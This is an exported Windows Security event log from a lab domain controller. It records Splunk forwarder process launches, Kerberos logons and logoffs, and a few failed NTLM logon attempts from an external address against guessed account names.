Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264923
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1484
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264922
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264924
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ae4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264927
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264930
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88F8E5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264929
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88F8E5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53831
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264928
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88F8E5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:46:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264932
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SRV-BACKUP
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264931
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: ACADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264933
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b14
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264935
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264934
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1560
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264936
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264938
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: CCSADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264937
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89141F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54074
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264939
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1810
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264941
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264940
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264942
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x89141F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:46:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264945
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8934D1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:46:56 PM
LogName=Security
